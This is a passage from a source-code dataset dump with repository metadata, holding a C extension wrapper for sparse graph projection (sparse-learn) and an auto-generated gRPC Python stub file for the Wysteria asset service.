projection')\n\nStep 1:\npip wheel /dir/to/proj-name/ -w /dir/where/wheels/are/written/\n\n" }, { "alpha_fraction": 0.549457848072052, "alphanum_fraction": 0.5618499517440796, "avg_line_length": 42.59485626220703, "blob_id": "40f7372ab98afccf2bae97a1c8bdc6c917127cdb", "content_id": "f9e008fe89335b27ad09257ec10c492ef6d1058f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 13557, "license_type": "permissive", "max_line_length": 85, "num_lines": 311, "path": "/sparse_learn/c/main_wrapper.c", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "#include <Python.h>\n#include <numpy/arrayobject.h>\n#include \"head_tail_proj.h\"\n\nstatic PyObject *test(PyObject *self, PyObject *args) {\n double sum = 0.0;\n PyArrayObject *x_tr_;\n if (!PyArg_ParseTuple(args, \"O!\", &PyArray_Type, &x_tr_)) { return NULL; }\n int n = (int) (x_tr_->dimensions[0]); // number of samples\n int p = (int) (x_tr_->dimensions[1]); // number of features\n printf(\"%d %d\\n\", n, p);\n double *x_tr = PyArray_DATA(x_tr_);\n for (int i = 0; i < n; i++) {\n for (int j = 0; j < p; j++) {\n printf(\"%.2f \", x_tr[i * p + j]);\n sum += x_tr[i * p + j];\n }\n printf(\"\\n\");\n }\n PyObject *results = PyFloat_FromDouble(sum);\n return results;\n}\n\nstatic PyObject *proj_head(PyObject *self, PyObject *args) {\n /**\n * DO NOT call this function directly, use the Python Wrapper instead.\n * list of args:\n * args[0]: ndarray dim=(m,2) -- edges of the graph.\n * args[1]: ndarray dim=(m,) -- weights (positive) of the graph.\n * args[2]: ndarray dim=(n,) -- the vector needs to be projected.\n * args[3]: integer np.int32 -- number of connected components returned.\n * args[4]: integer np.int32 -- sparsity (positive) parameter.\n * args[5]: double np.float64 -- budget of the graph model.\n * args[6]: double np.float64 -- delta. default is 1. / 169.\n * args[7]: integer np.int32 -- maximal # of iterations in the loop.\n * args[8]: double np.float64 -- error tolerance for minimum nonzero.\n * args[9]: integer np.int32 -- root(default is -1).\n * args[10]: string string -- pruning ['simple', 'gw', 'strong'].\n * args[11]: double np.float64-- epsilon to control the presion of PCST.\n * args[12]: integer np.int32 -- verbosity level\n * @return: (re_nodes, re_edges, p_x)\n * re_nodes: projected nodes\n * re_edges: projected edges (indices)\n * p_x: projection of x.\n */\n PyArrayObject *edges_, *weights_, *x_;\n int g, s, root, max_iter, verbose;\n double budget, delta, epsilon, err_tol;\n char *pruning;\n if (!PyArg_ParseTuple(\n args, \"O!O!O!iiddidizdi\", &PyArray_Type, &edges_, &PyArray_Type,\n &weights_, &PyArray_Type, &x_, &g, &s, &budget, &delta,\n &max_iter, &err_tol, &root, &pruning, &epsilon, &verbose)) {\n return NULL;\n }\n long n = x_->dimensions[0]; // number of nodes\n long m = edges_->dimensions[0]; // number of edges\n EdgePair *edges = malloc(sizeof(EdgePair) * m);\n double *prizes = malloc(sizeof(double) * n);\n double *costs = malloc(sizeof(double) * m);;\n double *x = (double *) PyArray_DATA(x_);\n PyObject *results = PyTuple_New(3);\n PyObject *p_x = PyList_New(n); // projected x\n for (int i = 0; i < m; i++) {\n edges[i].first = *(int *) PyArray_GETPTR2(edges_, i, 0);\n edges[i].second = *(int *) PyArray_GETPTR2(edges_, i, 1);\n double *wei = (double *) PyArray_GETPTR1(weights_, i);\n costs[i] = *wei + budget / s;\n }\n for (int i = 0; i < n; i++) {\n prizes[i] = (x[i]) * (x[i]);\n PyList_SetItem(p_x, i, PyFloat_FromDouble(0.0));\n }\n double C = 2. * budget;\n GraphStat *head_stat = make_graph_stat((int) n, (int) m);\n head_proj_exact(\n edges, costs, prizes, g, C, delta, max_iter,\n err_tol, root, GWPruning, epsilon, (int) n, (int) m,\n verbose, head_stat);\n PyObject *re_nodes = PyList_New(head_stat->re_nodes->size);\n PyObject *re_edges = PyList_New(head_stat->re_edges->size);\n for (int i = 0; i < head_stat->re_nodes->size; i++) {\n int node_i = head_stat->re_nodes->array[i];\n PyList_SetItem(re_nodes, i, PyLong_FromLong(node_i));\n PyList_SetItem(p_x, node_i, PyFloat_FromDouble(x[node_i]));\n }\n for (int i = 0; i < head_stat->re_edges->size; i++) {\n PyList_SetItem(re_edges, i,\n PyLong_FromLong(head_stat->re_edges->array[i]));\n }\n PyTuple_SetItem(results, 0, re_nodes);\n PyTuple_SetItem(results, 1, re_edges);\n PyTuple_SetItem(results, 2, p_x);\n free_graph_stat(head_stat);\n free(costs), free(prizes), free(edges);\n return results;\n}\n\nstatic PyObject *proj_tail(PyObject *self, PyObject *args) {\n /**\n * DO NOT call this function directly, use the Python Wrapper instead.\n * list of args:\n * args[0]: ndarray dim=(m,2) -- edges of the graph.\n * args[1]: ndarray dim=(m,) -- weights (positive) of the graph.\n * args[2]: ndarray dim=(n,) -- the vector needs to be projected.\n * args[3]: integer np.int32 -- number of connected components returned.\n * args[4]: integer np.int32 -- sparsity (positive) parameter.\n * args[5]: double np.float64 -- budget of the graph model.\n * args[6]: double np.float64 -- nu. default is 2.5\n * args[7]: integer np.int32 -- maximal # of iterations in the loop.\n * args[8]: double np.float32 -- error tolerance for minimum nonzero.\n * args[9]: integer np.int32 -- root(default is -1).\n * args[10]: string string -- pruning ['simple', 'gw', 'strong'].\n * args[11]: double np.float64-- epsilon to control the presion of PCST.\n * args[12]: integer np.int32 -- verbosity level\n * @return: (re_nodes, re_edges, p_x)\n * re_nodes: projected nodes\n * re_edges: projected edges (indices)\n * p_x: projection of x.\n */\n PyArrayObject *edges_, *weights_, *x_;\n int g, s, root, max_iter, verbose;\n double budget, nu, epsilon, err_tol;\n char *pruning;\n //edges, weights, x, g, s, budget, nu, max_iter, err_tol,\n // root, pruning, epsilon, verbose\n if (!PyArg_ParseTuple(\n args, \"O!O!O!iiddidizdi\", &PyArray_Type, &edges_, &PyArray_Type,\n &weights_, &PyArray_Type, &x_, &g, &s, &budget, &nu,\n &max_iter, &err_tol, &root, &pruning, &epsilon, &verbose)) {\n return NULL;\n }\n long n = x_->dimensions[0]; // number of nodes\n long m = edges_->dimensions[0]; // number of edges\n EdgePair *edges = malloc(sizeof(EdgePair) * m);\n double *prizes = malloc(sizeof(double) * n);\n double *costs = malloc(sizeof(double) * m);\n double *x = (double *) PyArray_DATA(x_);\n for (int i = 0; i < m; i++) {\n edges[i].first = *(int *) PyArray_GETPTR2(edges_, i, 0);\n edges[i].second = *(int *) PyArray_GETPTR2(edges_, i, 1);\n double *wei = (double *) PyArray_GETPTR1(weights_, i);\n costs[i] = (*wei + budget / s);\n }\n for (int i = 0; i < n; i++) {\n prizes[i] = (x[i]) * (x[i]);\n }\n double C = 2. * budget;\n PyObject *results = PyTuple_New(3);\n PyObject *p_x = PyList_New(n); // projected x\n for (int i = 0; i < n; i++) {\n prizes[i] = (x[i]) * (x[i]);\n PyList_SetItem(p_x, i, PyFloat_FromDouble(0.0));\n }\n GraphStat *tail_stat = make_graph_stat((int) n, (int) m);\n tail_proj_exact(\n edges, costs, prizes, g, C, nu, max_iter, err_tol, root, GWPruning,\n epsilon, (int) n, (int) m, verbose, tail_stat);\n PyObject *re_nodes = PyList_New(tail_stat->re_nodes->size);\n PyObject *re_edges = PyList_New(tail_stat->re_edges->size);\n for (int i = 0; i < tail_stat->re_nodes->size; i++) {\n int node_i = tail_stat->re_nodes->array[i];\n PyList_SetItem(re_nodes, i, PyLong_FromLong(node_i));\n PyList_SetItem(p_x, node_i, PyFloat_FromDouble(x[node_i]));\n }\n for (int i = 0; i < tail_stat->re_edges->size; i++) {\n PyList_SetItem(re_edges, i,\n PyLong_FromLong(tail_stat->re_edges->array[i]));\n }\n PyTuple_SetItem(results, 0, re_nodes);\n PyTuple_SetItem(results, 1, re_edges);\n PyTuple_SetItem(results, 2, p_x);\n free_graph_stat(tail_stat), free(costs), free(prizes), free(edges);\n return results;\n}\n\nstatic PyObject *proj_pcst(PyObject *self, PyObject *args) {\n /**\n * DO NOT call this function directly, use the Python Wrapper instead.\n * list of args:\n * args[0]: ndarray dim=(m,2) -- edges of the graph.\n * args[1]: ndarray dim=(n,) -- prizes of the graph.\n * args[2]: ndarray dim=(m,) -- costs on nodes.\n * args[3]: integer np.int32 -- root(default is -1).\n * args[4]: integer np.int32 -- number of connected components returned.\n * args[5]: string string -- pruning none, simple, gw, strong.\n * args[6]: double np.float32 -- epsilon to control the precision.\n * args[7]: integer np.int32 -- verbosity level\n * @return: (re_nodes, re_edges)\n * re_nodes: result nodes\n * re_edges: result edges\n */\n PyArrayObject *edges_, *prizes_, *weights_;\n int g, root, verbose;\n char *pruning;\n double epsilon;\n if (!PyArg_ParseTuple(args, \"O!O!O!iizdi\", &PyArray_Type, &edges_,\n &PyArray_Type, &prizes_, &PyArray_Type,\n &weights_, &root, &g, &pruning,\n &epsilon, &verbose)) { return NULL; }\n long n = prizes_->dimensions[0]; // number of nodes\n long m = edges_->dimensions[0]; // number of edges\n EdgePair *edges = malloc(sizeof(EdgePair) * m);\n double *prizes = (double *) PyArray_DATA(prizes_);\n double *costs = (double *) PyArray_DATA(weights_);\n for (int i = 0; i < m; i++) {\n edges[i].first = *(int *) PyArray_GETPTR2(edges_, i, 0);\n edges[i].second = *(int *) PyArray_GETPTR2(edges_, i, 1);\n }\n GraphStat *stat = make_graph_stat((int) n, (int) m);\n PCST *pcst = make_pcst(edges, prizes, costs, root,\n g, epsilon, GWPruning, (int) n, (int) m, verbose);\n run_pcst(pcst, stat->re_nodes, stat->re_edges), free_pcst(pcst);\n PyObject *results = PyTuple_New(2);\n PyObject *re_nodes = PyList_New(stat->re_nodes->size);\n PyObject *re_edges = PyList_New(stat->re_edges->size);\n for (int i = 0; i < stat->re_nodes->size; i++) {\n PyList_SetItem(re_nodes, i, PyLong_FromLong(stat->re_nodes->array[i]));\n }\n for (int i = 0; i < stat->re_edges->size; i++) {\n PyList_SetItem(re_edges, i, PyLong_FromLong(stat->re_edges->array[i]));\n }\n PyTuple_SetItem(results, 0, re_nodes);\n PyTuple_SetItem(results, 1, re_edges);\n free(edges), free(stat);\n return results;\n}\n\nstatic PyObject *head_tail_bi(PyObject *self, PyObject *args) {\n head_tail_bisearch_para *para = malloc(sizeof(head_tail_bisearch_para));\n PyArrayObject *edges_, *costs_, *prizes_;\n if (!PyArg_ParseTuple(args, \"O!O!O!iiiiii\",\n &PyArray_Type, &edges_,\n &PyArray_Type, &prizes_,\n &PyArray_Type, &costs_,\n &para->g,\n &para->root,\n &para->sparsity_low,\n &para->sparsity_high,\n &para->max_num_iter,\n &para->verbose)) { return NULL; }\n\n para->p = (int) prizes_->dimensions[0];\n para->m = (int) edges_->dimensions[0];\n para->prizes = (double *) PyArray_DATA(prizes_);\n para->costs = (double *) PyArray_DATA(costs_);\n para->edges = malloc(sizeof(EdgePair) * para->m);\n for (int i = 0; i < para->m; i++) {\n para->edges[i].first = *(int *) PyArray_GETPTR2(edges_, i, 0);\n para->edges[i].second = *(int *) PyArray_GETPTR2(edges_, i, 1);\n }\n GraphStat *graph_stat = make_graph_stat(para->p, para->m);\n head_tail_bisearch(\n para->edges, para->costs, para->prizes, para->p, para->m, para->g,\n para->root, para->sparsity_low, para->sparsity_high,\n para->max_num_iter, GWPruning, para->verbose, graph_stat);\n PyObject *results = PyTuple_New(1);\n PyObject *re_nodes = PyList_New(graph_stat->re_nodes->size);\n for (int i = 0; i < graph_stat->re_nodes->size; i++) {\n int cur_node = graph_stat->re_nodes->array[i];\n PyList_SetItem(re_nodes, i, PyLong_FromLong(cur_node));\n }\n PyTuple_SetItem(results, 0, re_nodes);\n free_graph_stat(graph_stat);\n free(para->edges);\n free(para);\n return results;\n}\n\n\nstatic PyMethodDef sparse_methods[] = {\n {\"c_test\", (PyCFunction) test, METH_VARARGS, \"docs\"},\n {\"c_proj_head\", (PyCFunction) proj_head, METH_VARARGS, \"docs\"},\n {\"c_proj_tail\", (PyCFunction) proj_tail, METH_VARARGS, \"docs\"},\n {\"c_proj_pcst\", (PyCFunction) proj_pcst, METH_VARARGS, \"docs\"},\n {\"c_head_tail_bi\", (PyCFunction) head_tail_bi, METH_VARARGS, \"docs\"},\n {NULL, NULL, 0, NULL}};\n\n#if PY_MAJOR_VERSION >= 3\nstatic struct PyModuleDef moduledef = {\n PyModuleDef_HEAD_INIT,\n \"sparse_learn\", /* m_name */\n \"This is a module\", /* m_doc */\n -1, /* m_size */\n sparse_methods, /* m_methods */\n NULL, /* m_reload */\n NULL, /* m_traverse */\n NULL, /* m_clear */\n NULL, /* m_free */\n };\n#endif\n\n/** Python version 2 for module initialization */\nPyMODINIT_FUNC\n#if PY_MAJOR_VERSION >= 3\nPyInit_sparse_learn(void){\n Py_Initialize();\n import_array(); // In order to use numpy, you must include this!\n return PyModule_Create(&moduledef);\n}\n#else\ninit_sparse_learn(void) {\n Py_InitModule3(\"sparse_learn\", sparse_methods, \"some docs for solam algorithm.\");\n import_array(); // In order to use numpy, you must include this!\n}\n\n#endif\n\nint main() {\n printf(\"test of main wrapper!\\n\");\n}" } ]
17
voidshard/pywysteria
https://github.com/voidshard/pywysteria
b4c4f1b2cafb7b1c0f6f83152dc036ef18e586ec
07c084f19376d7cc56fd539e5845e2d194f680c3
70998c48d2254968cc001350e807fdd4b91b868a
refs/heads/master
2021-01-20T07:23:58.409436
2019-08-04T12:01:09
2019-08-04T12:01:09
89,996,722
0
0
null
2017-05-02T05:57:54
2017-05-02T06:06:22
2017-10-08T10:04:06
Python
[ { "alpha_fraction": 0.7164829969406128, "alphanum_fraction": 0.7214187383651733, "avg_line_length": 44.139896392822266, "blob_id": "6baf0c5361be5937e2a5f7bfb0c90a55fab8c18f", "content_id": "c669a9141dde6abdc0ea28df44a169733d178f6f", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17424, "license_type": "permissive", "max_line_length": 83, "num_lines": 386, "path": "/wysteria/middleware/wgrpc/stubs.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!\nimport grpc\n\nfrom wysteria.middleware.wgrpc.wysteria import grpc_pb2 as wysteria_dot_grpc__pb2\n\n\nclass WysteriaGrpcStub(object):\n # missing associated documentation comment in .proto file\n pass\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.CreateCollection = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/CreateCollection',\n request_serializer=wysteria_dot_grpc__pb2.Collection.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n )\n self.CreateItem = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/CreateItem',\n request_serializer=wysteria_dot_grpc__pb2.Item.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n )\n self.CreateVersion = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/CreateVersion',\n request_serializer=wysteria_dot_grpc__pb2.Version.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.IdAndNum.FromString,\n )\n self.CreateResource = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/CreateResource',\n request_serializer=wysteria_dot_grpc__pb2.Resource.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n )\n self.CreateLink = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/CreateLink',\n request_serializer=wysteria_dot_grpc__pb2.Link.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n )\n self.DeleteCollection = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/DeleteCollection',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.DeleteItem = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/DeleteItem',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.DeleteVersion = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/DeleteVersion',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.DeleteResource = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/DeleteResource',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.FindCollections = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/FindCollections',\n request_serializer=wysteria_dot_grpc__pb2.QueryDescs.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Collections.FromString,\n )\n self.FindItems = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/FindItems',\n request_serializer=wysteria_dot_grpc__pb2.QueryDescs.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Items.FromString,\n )\n self.FindVersions = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/FindVersions',\n request_serializer=wysteria_dot_grpc__pb2.QueryDescs.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Versions.FromString,\n )\n self.FindResources = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/FindResources',\n request_serializer=wysteria_dot_grpc__pb2.QueryDescs.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Resources.FromString,\n )\n self.FindLinks = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/FindLinks',\n request_serializer=wysteria_dot_grpc__pb2.QueryDescs.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Links.FromString,\n )\n self.PublishedVersion = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/PublishedVersion',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Version.FromString,\n )\n self.SetPublishedVersion = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/SetPublishedVersion',\n request_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.UpdateVersionFacets = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/UpdateVersionFacets',\n request_serializer=wysteria_dot_grpc__pb2.IdAndDict.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.UpdateItemFacets = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/UpdateItemFacets',\n request_serializer=wysteria_dot_grpc__pb2.IdAndDict.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.UpdateCollectionFacets = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/UpdateCollectionFacets',\n request_serializer=wysteria_dot_grpc__pb2.IdAndDict.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.UpdateResourceFacets = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/UpdateResourceFacets',\n request_serializer=wysteria_dot_grpc__pb2.IdAndDict.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n self.UpdateLinkFacets = channel.unary_unary(\n '/wysteria_grpc.WysteriaGrpc/UpdateLinkFacets',\n request_serializer=wysteria_dot_grpc__pb2.IdAndDict.SerializeToString,\n response_deserializer=wysteria_dot_grpc__pb2.Text.FromString,\n )\n\n\nclass WysteriaGrpcServicer(object):\n # missing associated documentation comment in .proto file\n pass\n\n def CreateCollection(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateItem(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateVersion(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateResource(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def CreateLink(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def DeleteCollection(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def DeleteItem(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def DeleteVersion(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def DeleteResource(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def FindCollections(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def FindItems(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def FindVersions(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def FindResources(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def FindLinks(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def PublishedVersion(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def SetPublishedVersion(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def UpdateVersionFacets(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def UpdateItemFacets(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def UpdateCollectionFacets(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def UpdateResourceFacets(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def UpdateLinkFacets(self, request, context):\n # missing associated documentation comment in .proto file\n pass\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_WysteriaGrpcServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'CreateCollection': grpc.unary_unary_rpc_method_handler(\n servicer.CreateCollection,\n request_deserializer=wysteria_dot_grpc__pb2.Collection.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n ),\n 'CreateItem': grpc.unary_unary_rpc_method_handler(\n servicer.CreateItem,\n request_deserializer=wysteria_dot_grpc__pb2.Item.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n ),\n 'CreateVersion': grpc.unary_unary_rpc_method_handler(\n servicer.CreateVersion,\n request_deserializer=wysteria_dot_grpc__pb2.Version.FromString,\n response_serializer=wysteria_dot_grpc__pb2.IdAndNum.SerializeToString,\n ),\n 'CreateResource': grpc.unary_unary_rpc_method_handler(\n servicer.CreateResource,\n request_deserializer=wysteria_dot_grpc__pb2.Resource.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n ),\n 'CreateLink': grpc.unary_unary_rpc_method_handler(\n servicer.CreateLink,\n request_deserializer=wysteria_dot_grpc__pb2.Link.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Id.SerializeToString,\n ),\n 'DeleteCollection': grpc.unary_unary_rpc_method_handler(\n servicer.DeleteCollection,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'DeleteItem': grpc.unary_unary_rpc_method_handler(\n servicer.DeleteItem,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'DeleteVersion': grpc.unary_unary_rpc_method_handler(\n servicer.DeleteVersion,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'DeleteResource': grpc.unary_unary_rpc_method_handler(\n servicer.DeleteResource,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'FindCollections': grpc.unary_unary_rpc_method_handler(\n servicer.FindCollections,\n request_deserializer=wysteria_dot_grpc__pb2.QueryDescs.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Collections.SerializeToString,\n ),\n 'FindItems': grpc.unary_unary_rpc_method_handler(\n servicer.FindItems,\n request_deserializer=wysteria_dot_grpc__pb2.QueryDescs.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Items.SerializeToString,\n ),\n 'FindVersions': grpc.unary_unary_rpc_method_handler(\n servicer.FindVersions,\n request_deserializer=wysteria_dot_grpc__pb2.QueryDescs.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Versions.SerializeToString,\n ),\n 'FindResources': grpc.unary_unary_rpc_method_handler(\n servicer.FindResources,\n request_deserializer=wysteria_dot_grpc__pb2.QueryDescs.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Resources.SerializeToString,\n ),\n 'FindLinks': grpc.unary_unary_rpc_method_handler(\n servicer.FindLinks,\n request_deserializer=wysteria_dot_grpc__pb2.QueryDescs.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Links.SerializeToString,\n ),\n 'PublishedVersion': grpc.unary_unary_rpc_method_handler(\n servicer.PublishedVersion,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Version.SerializeToString,\n ),\n 'SetPublishedVersion': grpc.unary_unary_rpc_method_handler(\n servicer.SetPublishedVersion,\n request_deserializer=wysteria_dot_grpc__pb2.Id.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'UpdateVersionFacets': grpc.unary_unary_rpc_method_handler(\n servicer.UpdateVersionFacets,\n request_deserializer=wysteria_dot_grpc__pb2.IdAndDict.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'UpdateItemFacets': grpc.unary_unary_rpc_method_handler(\n servicer.UpdateItemFacets,\n request_deserializer=wysteria_dot_grpc__pb2.IdAndDict.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'UpdateCollectionFacets': grpc.unary_unary_rpc_method_handler(\n servicer.UpdateCollectionFacets,\n request_deserializer=wysteria_dot_grpc__pb2.IdAndDict.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'UpdateResourceFacets': grpc.unary_unary_rpc_method_handler(\n servicer.UpdateResourceFacets,\n request_deserializer=wysteria_dot_grpc__pb2.IdAndDict.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n 'UpdateLinkFacets': grpc.unary_unary_rpc_method_handler(\n servicer.UpdateLinkFacets,\n request_deserializer=wysteria_dot_grpc__pb2.IdAndDict.FromString,\n response_serializer=wysteria_dot_grpc__pb2.Text.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'wysteria_grpc.WysteriaGrpc', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n" }, { "alpha_fraction": 0.5365239381790161, "alphanum_fraction": 0.5541561841964722, "avg_line_length": 18.850000381469727, "blob_id": "e2e1ac9a49c143f0895adb2b1101cda802022c2d", "content_id": "9977ee3fd2f1cddceab48e10dadf469d27e55b7e", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 397, "license_type": "permissive", "max_line_length": 78, "num_lines": 20, "path": "/examples/06/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample06: Limits & offsets\n\"\"\"\n\nimport 